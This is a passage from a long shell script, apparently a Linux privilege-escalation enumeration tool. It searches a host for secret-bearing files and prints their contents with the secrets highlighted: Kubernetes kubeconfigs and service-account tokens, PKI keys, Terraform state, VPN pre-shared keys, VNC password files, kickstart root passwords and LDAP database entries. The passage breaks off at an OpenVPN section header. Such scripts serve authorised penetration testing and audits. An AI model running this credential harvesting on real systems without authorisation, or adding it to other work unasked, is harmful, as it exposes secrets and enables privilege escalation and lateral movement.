  10290     if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.ca$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.ca"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.ca$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,glusterfs\.ca$,${SED_RED},"; done; echo "";
  10291     if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.key"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,glusterfs\.key$,${SED_RED},"; done; echo "";
  10292 fi
  10293 
  10294 
  10295 if [ "$PSTORAGE_ANACONDA_KS" ] || [ "$DEBUG" ]; then
  10296   print_2title "Analyzing Anaconda ks Files (limit 70)"
  10297     if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "anaconda-ks.cfg"; fi; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo "";
  10298 fi
  10299 
  10300 
  10301 if [ "$PSTORAGE_TERRAFORM" ] || [ "$DEBUG" ]; then
  10302   print_2title "Analyzing Terraform Files (limit 70)"
  10303     if ! [ "`echo \"$PSTORAGE_TERRAFORM\" | grep -E \"\.tfstate$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.tfstate"; fi; fi; printf "%s" "$PSTORAGE_TERRAFORM" | grep -E "\.tfstate$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.tfstate$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*,${SED_RED},g"; done; echo "";
  10304     if ! [ "`echo \"$PSTORAGE_TERRAFORM\" | grep -E \"\.tf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.tf"; fi; fi; printf "%s" "$PSTORAGE_TERRAFORM" | grep -E "\.tf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.tf$,${SED_RED},"; done; echo "";
  10305     if ! [ "`echo \"$PSTORAGE_TERRAFORM\" | grep -E \"credentials\.tfrc\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.tfrc.json"; fi; fi; printf "%s" "$PSTORAGE_TERRAFORM" | grep -E "credentials\.tfrc\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.tfrc\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10306 fi
  10307 
  10308 
  10309 if [ "$PSTORAGE_RACOON" ] || [ "$DEBUG" ]; then
  10310   print_2title "Analyzing Racoon Files (limit 70)"
  10311     if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "racoon.conf"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo "";
  10312     if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10313 fi
  10314 
  10315 
  10316 if [ "$PSTORAGE_KUBERNETES" ] || [ "$DEBUG" ]; then
  10317   print_2title "Analyzing Kubernetes Files (limit 70)"
  10318     (env || set) | grep -Ei "kubernetes|kube" | grep -v "PSTORAGE_KUBERNETES|USEFUL_SOFTWARE" | sed -${E} "s,kubernetes|kube,${SED_RED},"
  10319     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubeconfig.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*kubeconfig*"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubeconfig.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubeconfig.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:|impersonate,${SED_RED},g"; done; echo "";
  10320     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"admin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "admin.conf"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "admin\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,admin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";
  10321     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"bootstrap-kubelet\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bootstrap-kubelet.conf"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "bootstrap-kubelet\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bootstrap-kubelet\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";
  10322     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet.conf"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubelet\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";
  10323     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"\.kube.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".kube*"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "\.kube.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.kube.*$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";done; echo "";
  10324     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubernetes$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubernetes"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubernetes$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubernetes$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";find "$f" -name "manifests" | while read ff; do ls -ld "$ff" | sed -${E} "s,manifests,${SED_RED},"; find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,--(advertise-address|anonymous-auth|authorization|authorization-config|audit|encryption-provider-config|service-account|client-ca-file|kubelet-client|etcd|secure-port)|hostPath:|hostNetwork:|privileged:|serviceAccountName:|image:|command:|mountPath:,${SED_RED},g"; done; echo "";find "$f" -name "*.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,--(advertise-address|anonymous-auth|authorization|authorization-config|audit|encryption-provider-config|service-account|client-ca-file|kubelet-client|etcd|secure-port)|hostPath:|hostNetwork:|privileged:|serviceAccountName:|image:|command:|mountPath:,${SED_RED},g"; done; echo "";done; echo "";find "$f" -name "pki" | while read ff; do ls -ld "$ff" | sed -${E} "s,pki,${SED_RED},"; find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.crt" | while read ff; do ls -ld "$ff" | sed -${E} "s,.crt,${SED_RED},"; done; echo "";done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*encryption*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,encryption.*.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,providers:|aescbc:|aesgcm:|secretbox:|kms:|key:|name:|endpoint:,${SED_RED},g"; done; echo "";find "$f" -name "*audit*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,audit.*.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,level:|resources:|verbs:|users:|omitStages:|webhook:|path:,${SED_RED},g"; done; echo "";find "$f" -name "*webhook*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,webhook.*.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|url:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|exec:,${SED_RED},g"; done; echo "";done; echo "";
  10325     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubelet$,${SED_RED},"; find "$f" -name "config.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,authentication:|authorization:|anonymous:|webhook:|readOnlyPort:|tlsCertFile:|tlsPrivateKeyFile:|staticPodPath:|podPidsLimit:|featureGates:|serverTLSBootstrap:,${SED_RED},g"; done; echo "";find "$f" -name "kubeadm-flags.env" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeadm-flags.env,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,--(bootstrap-kubeconfig|kubeconfig|config|container-runtime-endpoint|pod-infra-container-image|image-credential-provider-config|image-credential-provider-bin-dir),${SED_RED},g"; done; echo "";find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";find "$f" -name "pki" | while read ff; do ls -ld "$ff" | sed -${E} "s,pki,${SED_RED},"; find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";done; echo "";find "$f" -name "kubernetes.io~secret" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubernetes.io~secret,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";find "$f" -name "kubernetes.io~projected" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubernetes.io~projected,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";find "$f" -name "kubernetes.io~csi" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubernetes.io~csi,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";done; echo "";
  10326     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kube-proxy$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kube-proxy"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kube-proxy$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kube-proxy$,${SED_RED},"; find "$f" -name "config.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,clientConnection:|kubeconfig:|server:|certificate-authority:|token:|mode:|metricsBindAddress:|healthzBindAddress:,${SED_RED},g"; done; echo "";find "$f" -name "kubeconfig.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeconfig.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";done; echo "";
  10327     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubernetes\.io$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubernetes.io"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubernetes\.io$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubernetes\.io$,${SED_RED},"; find "$f" -name "serviceaccount" | while read ff; do ls -ld "$ff" | sed -${E} "s,serviceaccount,${SED_RED},"; find "$f" -name "token" | while read ff; do ls -ld "$ff" | sed -${E} "s,token,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "namespace" | while read ff; do ls -ld "$ff" | sed -${E} "s,namespace,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "ca.crt" | while read ff; do ls -ld "$ff" | sed -${E} "s,ca.crt,${SED_RED},"; done; echo "";done; echo "";done; echo "";
  10328     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"net\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "net.d"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "net\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,net\.d$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,type|delegate|kubeconfig|token|certificate|key|endpoint|apiRoot|etcd,${SED_RED},g"; done; echo "";find "$f" -name "*.conflist" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conflist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,type|delegate|kubeconfig|token|certificate|key|endpoint|apiRoot|etcd,${SED_RED},g"; done; echo "";done; echo "";
  10329     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"containerd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "containerd"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "containerd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,containerd$,${SED_RED},"; find "$f" -name "config.toml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.toml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,registry|auth|username|password|token|cert|key|endpoint|sandbox_image|privileged|plugins,${SED_RED},g"; done; echo "";find "$f" -name "hosts.toml" | while read ff; do ls -ld "$ff" | sed -${E} "s,hosts.toml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server|capabilities|ca|client|skip_verify|auth,${SED_RED},g"; done; echo "";done; echo "";
  10330     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"crio$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "crio"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "crio$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,crio$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,auth|username|password|token|cert|key|registry|endpoint|pause_image|pinns_path|conmon,${SED_RED},g"; done; echo "";done; echo "";
  10331     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"etcd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "etcd"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "etcd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,etcd$,${SED_RED},"; find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.crt" | while read ff; do ls -ld "$ff" | sed -${E} "s,.crt,${SED_RED},"; done; echo "";find "$f" -name "*.db" | while read ff; do ls -ld "$ff" | sed -${E} "s,.db,${SED_RED},"; done; echo "";find "$f" -name "db" | while read ff; do ls -ld "$ff" | sed -${E} "s,db,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,listen-client-urls|listen-peer-urls|advertise-client-urls|cert-file|key-file|trusted-ca-file|client-cert-auth|auto-tls|peer-auto-tls,${SED_RED},g"; done; echo "";done; echo "";
  10332     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"origin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "origin"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "origin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,origin$,${SED_RED},"; find "$f" -name "*.kubeconfig" | while read ff; do ls -ld "$ff" | sed -${E} "s,.kubeconfig,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:|server:|client-certificate-data:|client-key-data:|encryption|audit|etcd|service-account|hostPath:|privileged:|oauth,${SED_RED},g"; done; echo "";done; echo "";
  10333     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"k0s$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "k0s"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "k0s$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,k0s$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";find "$f" -name "token" | while read ff; do ls -ld "$ff" | sed -${E} "s,token,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:|server:|client-certificate-data:|client-key-data:|encryption|audit|etcd|service-account|hostPath:|privileged:,${SED_RED},g"; done; echo "";done; echo "";
  10334     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"k3s$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "k3s"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "k3s$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,k3s$,${SED_RED},"; find "$f" -name "k3s.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,k3s.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:,${SED_RED},g"; done; echo "";find "$f" -name "token" | while read ff; do ls -ld "$ff" | sed -${E} "s,token,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:|server:|client-certificate-data:|client-key-data:|encryption|audit|etcd|service-account|hostPath:|privileged:,${SED_RED},g"; done; echo "";done; echo "";
  10335     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"rke2$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rke2"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "rke2$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rke2$,${SED_RED},"; find "$f" -name "rke2.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,rke2.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:,${SED_RED},g"; done; echo "";find "$f" -name "token" | while read ff; do ls -ld "$ff" | sed -${E} "s,token,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:|server:|client-certificate-data:|client-key-data:|encryption|audit|etcd|service-account|hostPath:|privileged:,${SED_RED},g"; done; echo "";done; echo "";
  10336     if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"microk8s$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "microk8s"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "microk8s$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,microk8s$,${SED_RED},"; find "$f" -name "*.config" | while read ff; do ls -ld "$ff" | sed -${E} "s,.config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:,${SED_RED},g"; done; echo "";find "$f" -name "known_tokens.csv" | while read ff; do ls -ld "$ff" | sed -${E} "s,known_tokens.csv,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.crt" | while read ff; do ls -ld "$ff" | sed -${E} "s,.crt,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:|server:|client-certificate-data:|client-key-data:|encryption|audit|etcd|service-account|hostPath:|privileged:,${SED_RED},g"; done; echo "";done; echo "";
  10337 fi
  10338 
  10339 
  10340 if [ "$PSTORAGE_VNC" ] || [ "$DEBUG" ]; then
  10341   print_2title "Analyzing VNC Files (limit 70)"
  10342     if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".vnc"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vnc$,${SED_RED},"; find "$f" -name "passwd" | while read ff; do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo "";
  10343     if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.c*nf*"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10344     if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.ini"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo "";
  10345     if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.txt"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10346     if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.xml"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10347 fi
  10348 
  10349 
  10350 if [ "$PSTORAGE_LDAP" ] || [ "$DEBUG" ]; then
  10351   print_2title "Analyzing Ldap Files (limit 70)"
  10352     echo "The password hash is from the {SSHA} to 'structural'"
  10353     if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ldap"; fi; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ldap$,${SED_RED},"; find "$f" -name "*.bdb" | while read ff; do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo "";
  10354 fi
  10355 
  10356 
  10357 if [ "$PSTORAGE_OPENVPN" ] || [ "$DEBUG" ]; then
  10358   print_2title "Analyzing OpenVPN Files (limit 70)"
